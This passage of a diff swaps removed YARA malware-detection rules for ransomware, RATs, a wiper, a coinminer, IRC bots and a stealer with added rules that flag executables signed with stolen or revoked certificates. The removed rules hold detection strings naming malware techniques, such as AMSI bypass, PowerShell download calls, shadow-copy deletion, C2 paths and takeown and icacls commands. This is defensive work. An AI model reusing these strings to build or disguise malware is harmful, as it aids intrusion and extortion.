-		$s12 = { 0d 4c e3 5c c9 0d 1f 4c 89 7c da a1 b7 8c ee 7c }
+		thumbprint = "63ad44acaa7cd7f8249423673fbf3c3273e7b2dc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy" and pe.signatures [ i ] . serial == "7e:89:b9:df:00:6b:d1:aa:4c:48:d8:65:03:96:34:ca" )
 }
-rule DITEKSHEN_MALWARE_Win_EXEPWSHDL : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ddeb53F957337Fbeaf98C4A615B149D : FILE
 {
 	meta:
-		description = "Detects executable downloaders using PowerShell"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1e5a414b-e81e-5915-b00b-75edbfcc32d2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "13347f66-c726-59be-9d0e-871512335bbd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7356-L7374"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2703-L2714"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "58fbd27758ecd435eb30b7c34f4cf142db8e31edee0838175992923a51706508"
+		logic_hash = "4932dcea41879fd29250456cfef7a32a1303f599adbd4b61d91cb2e7e22cf5a2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "[Ref].Assembly.GetType(" ascii wide
-		$x2 = ".SetValue($null,$true)" ascii wide
-		$s1 = "replace" ascii wide
-		$s2 = "=@(" ascii wide
-		$s3 = "[System.Text.Encoding]::" ascii wide
-		$s4 = ".substring" ascii wide
-		$s5 = "FromBase64String" ascii wide
-		$d1 = "New-Object" ascii wide
-		$d2 = "Microsoft.XMLHTTP" ascii wide
-		$d3 = ".open(" ascii wide
-		$d4 = ".send(" ascii wide
+		thumbprint = "91cabea509662626e34326687348caf2dd3b4bba"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of ( $x* ) and ( 3 of ( $s* ) or all of ( $d* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mozilla Corporation" and pe.signatures [ i ] . serial == "0d:de:b5:3f:95:73:37:fb:ea:f9:8c:4a:61:5b:14:9d" )
 }
-rule DITEKSHEN_MALWARE_Win_MB150 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C88Af896B6452241Fe00E3Aaec11B1F8 : FILE
 {
 	meta:
-		description = "Detects MB150? Go ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9688974b-ccf9-59ea-bb31-e46c63f021bf"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4d73705a-e980-5aa0-a326-e35990226e37"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7376-L7402"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2716-L2727"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a07535fc53912ddde6a0bed187c21ecdb2701d317d7de0cbdd2db37071bc9a21"
+		logic_hash = "3a5f290f9479189ff83bf5da3a3d086453c9230311a48f4c0bd4654024ebeef8"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = /main\.evade_(clicks_count|cpu_count|disk_size|foreground_window|hostname|mac|printer|screen_size|system_memory|time_acceleration|tmp|utc)/ fullword ascii
-		$x2 = /main\.sandbox_(hostname|mac_addresses)/ fullword ascii
-		$x3 = "main.drop_ransom_note" fullword ascii
-		$x4 = "main.ransom_amount" fullword ascii
-		$x5 = "main.create_encryption_key" fullword ascii
-		$x6 = "main.encrypt" fullword ascii
-		$x7 = "main.encrypt_encryption_key" fullword ascii
-		$x8 = "main.encrypt_file" fullword ascii
-		$x9 = "main.ext_blacklist" fullword ascii
-		$mac1 = "00:03:FF00:05:6900:0C:2900:16:3E00:1C:1400:1C:4200:50:56" ascii nocase
-		$mac2 = "00-03-FF00-05-6900-0C-2900-16-3E00-1C-1400-1C-4200-50-56" ascii nocase
-		$mac3 = "0003FF000569000C2900163E001C14001C42005056" ascii nocase
-		$go = "Go build ID:" ascii
-		$s1 = "main.MB150" ascii
-		$s2 = "http://1.1.1.1" ascii
-		$s3 = "your personnal ID" ascii
-		$s4 = "ransom amount" ascii
-		$s5 = "binance.com" ascii
-		$s6 = "getmonero.org" ascii
+		thumbprint = "9ce1cbf5be77265af2a22e28f8930c2ac5641e12"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or ( $go and 4 of ( $s* ) ) or ( 1 of ( $mac* ) and ( 2 of ( $x* ) or 3 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "00:c8:8a:f8:96:b6:45:22:41:fe:00:e3:aa:ec:11:b1:f8" )
 }
-rule DITEKSHEN_MALWARE_Win_Chaos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_09E015E98E4Fabcc9Ac43E042C96090D : FILE
 {
 	meta:
-		description = "Detects Chaos ransomware"
+		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
 		author = "ditekSHen"
-		id = "59d43cfb-72d8-5c17-87bf-f1f364d23bed"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7404-L7433"
+		id = "577cff87-b676-598b-acea-e7c01df0ef15"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://blog.macnica.net/blog/2020/11/dtrack.html"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2729-L2742"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6203ab09745db817b9e909d70cf1d5be9769c414461ee5f7bb344b6959986537"
+		logic_hash = "77f9f50c6dd862419edaa7c3fcee0ce3f607a5b7b939d7844969082ab9777bbf"
 		score = 75
-		quality = 44
+		quality = 75
 		tags = "FILE"
+		thumbprint = "04e407118516053ff248503b31d6eec6daf4a809"
+		importance = 20
 
-	strings:
-		$s1 = "<EncyptedKey>" fullword wide
-		$s2 = "<EncryptedKey>" fullword wide
-		$s3 = "C:\\Users\\" fullword wide
-		$s4 = "read_it.txt" fullword wide
-		$s5 = "#base64Image" fullword wide
-		$s6 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" fullword wide
-		$s7 = /check(Spread|Sleep|AdminPrivilage|deleteShadowCopies|disableRecoveryMode|deleteBackupCatalog)/ fullword ascii nocase
-		$s8 = /(delete|disable)(ShadowCopies|RecoveryMode|BackupCatalog)/ fullword ascii nocase
-		$s9 = "spreadName" fullword ascii
-		$s10 = "processName" fullword ascii
-		$s11 = "sleepOutOfTempFolder" fullword ascii
-		$s12 = "AlreadyRunning" fullword ascii
-		$s13 = "random_bytes" fullword ascii
-		$s14 = "encryptDirectory" fullword ascii nocase
-		$s15 = "EncryptFile" fullword ascii nocase
-		$s16 = "intpreclp" fullword ascii
-		$s17 = "bytesToBeEncrypted" fullword ascii
-		$s18 = "textToEncrypt" fullword ascii
-		$m1 = "Chaos is" wide
-		$m2 = "Payment informationAmount:" wide
-		$m3 = "Coinmama - hxxps://www.coinmama.com Bitpanda - hxxps://www.bitpanda.com" wide
-		$m4 = "where do I get Bitcoin" wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or all of ( $m* ) or ( 2 of ( $m* ) and 4 of ( $s* ) )
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jetico Inc. Oy" and pe.signatures [ i ] . serial == "09:e0:15:e9:8e:4f:ab:cc:9a:c4:3e:04:2c:96:09:0d" )
 }
-rule DITEKSHEN_MALWARE_Win_Horuseyesrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_118D813D830F218C0F46D4Fc : FILE
 {
 	meta:
-		description = "Detects HorusEyesRAT"
+		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
 		author = "ditekSHen"
-		id = "80b2fd11-f8b4-5aee-b55a-4f7ee9fad6cf"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b14b14c8-202d-533d-97dc-c6336ddf75c4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7435-L7451"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2744-L2755"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c0f499e3a17923b391ed6b7fa723525a9d4aef0ce04a2c7abec60d5eda15888f"
+		logic_hash = "3240504794394c06f050ef3eb5ef82e0b476e2bbeabfb394fc4646e98bc6e976"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\HorusEyesRat-" ascii
-		$x2 = "\\HorusEyesRat.pdb" ascii
-		$x3 = "get_horus_eye" ascii
-		$s1 = "get_Type_Packet" fullword ascii
-		$s2 = "PacketLib" fullword ascii nocase
-		$s3 = "System.Net.Sockets" fullword ascii
-		$s4 = "PROCESS_MODE_BACKGROUND_BEGIN" fullword ascii
-		$s5 = "EXECUTION_STATE" fullword ascii
-		$s6 = /Plugins\\[A-Z]{2}.dll/ fullword wide
+		thumbprint = "bd16f70bf6c2ef330c5a4f3a27856a0d030d77fa"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) and #s6 > 4 ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Shen Wei Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "11:8d:81:3d:83:0f:21:8c:0f:46:d4:fc" )
 }
-rule DITEKSHEN_MALWARE_Win_Breakwin : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2304Ecf0Ea2B2736Beddd26A903Ba952 : FILE
 {
 	meta:
-		description = "Detects BreakWin Wiper"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4ffadbfa-c1cc-59e6-a9ba-7a34eca6c3fe"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3e064799-2333-5d10-8841-8d0a44ad9c1b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7453-L7471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2757-L2768"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "86fc89e28fc107c2d4fe98dc16048d9e076b1fef53a3df0814f80a88bbe09c48"
+		logic_hash = "c10695440ec4e39cf5b51c926ceeacc13caf3a58006c64b0168a04b4755978a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Started wiping file %s with %s." fullword wide
-		$s2 = "C:\\Program Files\\Lock My PC" wide
-		$s3 = "Stardust is still alive." fullword wide
-		$s4 = "Failed to terminate the locker process." fullword wide
-		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s6 = "Process created successfully. Executed command: %s." fullword wide
-		$s7 = "locker_background_image_path" fullword ascii
-		$s8 = "takeown.exe /F \"C:\\Windows\\Web\\Screen\" /R /A /D Y" fullword ascii
-		$s9 = "icacls.exe \"C:\\Windows\\Web\\Screen\" /reset /T" fullword ascii
-		$s10 = "takeown.exe /F \"C:\\ProgramData\\Microsoft\\Windows\\SystemData\" /R /A /D Y" fullword ascii
-		$s11 = ".?AVProcessSnapshotCreationFailedException@@" fullword ascii
+		thumbprint = "d59a63e230cef77951cb73a8d65576f00c049f44"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x88\\x90\\xE9\\x83\\xBD\\xE5\\x90\\x89\\xE8\\x83\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE8\\xB4\\xA3\\xE4\\xBB\\xBB\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "23:04:ec:f0:ea:2b:27:36:be:dd:d2:6a:90:3b:a9:52" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4D78E90E0950Fc630000000055657E1A : FILE
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e0e57557-7c46-5336-b904-c4c1f142bd81"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bb48d309-e7b8-5c39-b989-cce4093b2082"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7506-L7528"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2770-L2781"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f22e1af955a0d132dda820fe5e5e1ae2f077b7264ce1f0125a2f37c0da6b6508"
+		logic_hash = "c2a3714173defa7b8e97ea92f8f85fb47011099bdc24067aafa273ebdd282f0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "UnVzc2lhbiBTdGFuZGFyZCBUaW1l" wide
-		$s2 = "/xmrig" wide
-		$s3 = "/gminer" wide
-		$s4 = "-o {0} -u {1} -p {2} -k --cpu-priority 0 --threads={3}" wide
-		$s5 = "--algo ethash --server" wide
-		$s6 = "--algo kawpow --server" wide
-		$cnc1 = "/delonl.php?hwid=" fullword wide
-		$cnc2 = "/gateonl.php?hwid=" fullword wide
-		$cnc3 = "&cpuname=" fullword wide
-		$cnc4 = "&gpuname=" fullword wide
-		$cnc5 = "{0}/gate.php?hwid={1}&os={2}&cpu={3}&gpu={4}&dateinstall={5}&gpumem={6}" fullword wide
-		$cnc6 = "/del.php?hwid=" fullword wide
-		$f1 = "<StartGpuethGminer>b__" ascii
-		$f2 = "<StartGpuetcGminer>b__" ascii
-		$f3 = "<StartGpurvnGminer>b__" ascii
+		thumbprint = "fd010fdee2314f5d87045d1d7bf0da01b984b0fe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $cnc* ) or ( 2 of ( $f* ) and ( 1 of ( $s* ) or 1 of ( $f* ) ) ) or all of ( $f* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telus Health Solutions Inc." and pe.signatures [ i ] . serial == "4d:78:e9:0e:09:50:fc:63:00:00:00:00:55:65:7e:1a" )
 }
-rule DITEKSHEN_MALWARE_Win_Zeppelin : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0092Bc051F1811Bb0B86727C36394F7849 : FILE
 {
 	meta:
-		description = "Detects Zeppelin (Delphi) ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "368d0c31-745d-50ad-a265-50561fdc822a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9ffef880-ed00-54a7-8eb2-995c5c4e74f1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7530-L7545"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2783-L2794"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6c8420756b562662985dd26eaad58500a24cae786a47b788c953e86276116a1"
+		logic_hash = "bdf847f95bc6cc50513b76c57c3e76bc17caacd3419baabb2cab0161feb67508"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "TUnlockAndEncrypt" ascii
-		$s2 = "TExcludeFiles" ascii
-		$s3 = "TExcludeFolders" ascii
-		$s4 = "TDrivesAndShares" ascii
-		$s5 = "TTaskKiller" ascii
-		$x1 = "!!! D !!!" ascii
-		$x2 = "!!! LOCALPUBKEY !!!" ascii
-		$x3 = "!!! ENCLOCALPRIVKEY !!!" ascii
+		thumbprint = "d1f9930521e172526a9f018471d4575d60d8ad8f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MISTO EKONOMSKE STORITVE, d.o.o." and pe.signatures [ i ] . serial == "00:92:bc:05:1f:18:11:bb:0b:86:72:7c:36:39:4f:78:49" )
 }
-rule DITEKSHEN_MALWARE_Win_Slackbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_B4F42E2C153C904Fda64C957Ed7E1028 : FILE
 {
 	meta:
-		description = "Detects SlackBot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cd540aa2-dc8f-5ccc-b66c-a8d72b73c896"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d284b7f0-9728-5755-87d5-f8251903e778"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7547-L7588"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2796-L2807"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "919839883c437b69cf7f380830f2499be24415f96f1e42424e4859114f958581"
+		logic_hash = "d47f85602234eae7629b778b09ed5c3656c6afa8b6a7ba42cc46f451202a16c0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "lp0o4bot v" ascii
-		$x2 = "slackbot " ascii
-		$s1 = "cpu: %lumhz %s, uptime: %u+%.2u:%.2u, os: %s" fullword ascii
-		$s2 = "%s, running for %u+%.2u:%.2u" fullword ascii
-		$s3 = "PONG :%s" fullword ascii
-		$s4 = "PRIVMSG %s :%s" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" fullword ascii
-		$m1 = "saving %s to %s" ascii
-		$m2 = "visit number %u failed" ascii
-		$m3 = "sending %s packets of %s bytes to %s with a delay of %s" ascii
-		$m4 = "file executed" ascii
-		$m5 = "packets sent" ascii
-		$m6 = "upgrading to %s" ascii
-		$m7 = "rebooting..." ascii
-		$c1 = "!@remove" fullword ascii
-		$c2 = "!@restart" fullword ascii
-		$c3 = "!@reboot" fullword ascii
-		$c4 = "!@rndnick" fullword ascii
-		$c5 = "!@exit" fullword ascii
-		$c6 = "!@sysinfo" fullword ascii
-		$c7 = "!@upgrade" fullword ascii
-		$c8 = "!@login" fullword ascii
-		$c9 = "!@run" fullword ascii
-		$c10 = "!@webdl" fullword ascii
-		$c11 = "!@cycle" fullword ascii
-		$c12 = "!@clone" fullword ascii
-		$c13 = "!@visit" fullword ascii
-		$c14 = "!@udp" fullword ascii
-		$c15 = "!@nick" fullword ascii
-		$c16 = "!@say" fullword ascii
-		$c17 = "!@quit" fullword ascii
-		$c18 = "!@part" fullword ascii
-		$c19 = "!@join" fullword ascii
-		$c20 = "!@raw" fullword ascii
+		thumbprint = "ed4c50ab4f173cf46386a73226fa4dac9cadc1c4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or all of ( $m* ) or ( 10 of ( $c* ) and ( 1 of ( $x* ) or 3 of ( $s* ) or 2 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NONO spol. s r.o." and pe.signatures [ i ] . serial == "b4:f4:2e:2c:15:3c:90:4f:da:64:c9:57:ed:7e:10:28" )
 }
-rule DITEKSHEN_MALWARE_Win_Sweetystealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ac307E5257Bb814B818D3633B630326F : FILE
 {
 	meta:
-		description = "Detects SweetyStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "21dd1706-2cb5-5b27-ad3a-c3de8e6fb333"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b6d6c195-cd02-5ecd-82f3-348ab6f26eb5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7590-L7608"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2809-L2820"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ecf22240b47af077055260faba0406721f1b4cc5ed04180285df0de86c4e1241"
+		logic_hash = "f187d3084eb189cdd0e858aed1d9589d586f369b128679c6c1dec860e544f326"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SWEETY STEALER" wide
-		$s2 = "\\SWEETYLOG.zip" fullword wide
-		$s3 = "\\SWEETY STEALER\\SWEETY\\" ascii
-		$s4 = "\\Sweety" fullword wide
-		$s5 = "SWEETYSTEALER." ascii
-		$s6 = "in Virtual Environment, so we prevented stealing" wide
-		$s7 = ":purple_square:" wide
-		$f1 = "<GetDomainDetect>b__" ascii
-		$f2 = "<GetAllProfiles>b__" ascii
-		$f3 = "<ProcessExtraFieldZip64>b__" ascii
-		$f4 = "<PostExtractCommandLine>k__" ascii
+		thumbprint = "4d6a089ec4edcac438717c1d64a8be4ef925a9c6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $s* ) or ( 3 of ( $f* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" )
 }
-rule DITEKSHEN_MALWARE_Win_Genircbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_063A7D09107Eddd8Aa1F733634C6591B : FILE
 {
 	meta:
-		description = "Detects generic IRCBots"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e1faa1dd-bbf5-5208-97d6-a6e8597d39bc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "489daa61-8409-500d-bc46-a42a444fcdc0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7610-L7626"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2822-L2833"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc7f4599148c45fdf755c07530ae4846b7e283b5c1001c121f9ea05279997dc1"
+		logic_hash = "8b6c1935d51207e6b9919c85d369dcc6963f52ee4d21758d18e2c57115e9051b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "@login" ascii nocase
-		$s2 = "PRIVMSG" fullword ascii
-		$s3 = "JOIN" fullword ascii
-		$s4 = "PING :" fullword ascii
-		$s5 = "NICK" fullword ascii
-		$s6 = "USER" fullword ascii
-		$x1 = "irc.danger.net" fullword ascii nocase
-		$x2 = "evilBot" fullword ascii nocase
-		$x3 = "#evilChannel" fullword ascii nocase
+		thumbprint = "a03f9b3f3eb30ac511463b24f2e59e89ee4c6d4a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 2 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" )
 }
-rule DITEKSHEN_MALWARE_Win_Nitro : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4C687A0022C36F89E253F91D1F6954E2 : FILE
 {
 	meta:
-		description = "Detects Nitro Ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3edb62e0-0544-5291-a949-a45fdf881c7e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d4b03832-60f2-5342-8186-3e6c3d7eeb63"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7628-L7652"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2835-L2846"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "03da21ece2de530a9c2ba08a9e44c9a92bc9ca0a6d4ac9507899d1f3dcd03e37"
+		logic_hash = "0bcbe8c85f02735378b5be95c098ca5088f451e390ec6ce76fb732f0db297c1f"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = ".givemenitro" wide
-		$x2 = "Nitro Ransomware" ascii wide
-		$x3 = "\\NitroRansomware.pdb" ascii
-		$x4 = "NitroRansomware" ascii wide nocase
-		$s1 = "Valid nitro code was received" wide
-		$s2 = "discord nitro" ascii wide nocase
-		$s3 = "Starting file encryption" wide
-		$s4 = "NR_decrypt.txt" wide
-		$s5 = "open it unless you have the decryption key." ascii
-		$s6 = "<EncryptAll>b__" ascii
-		$s7 = "<DecryptAll>b__" ascii
-		$s8 = "DECRYPT_PASSWORD" fullword ascii
-		$s9 = "IsEncrypted" fullword ascii
-		$s10 = "CmdProcess_OutputDataReceived" fullword ascii
-		$s11 = "encryptedFileLog" fullword ascii
-		$s12 = "Encrypting:" fullword wide
-		$s13 = "decryption key. If you do so, your files may get corrupted" ascii
+		thumbprint = "4412007ae212d12cea36ed56985bd762bd9fb54a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) or ( 7 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" )
 }
-rule DITEKSHEN_MALWARE_Win_Nanocore : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3Cee26C125B8C188F316C3Fa78D9C2F1 : FILE
 {
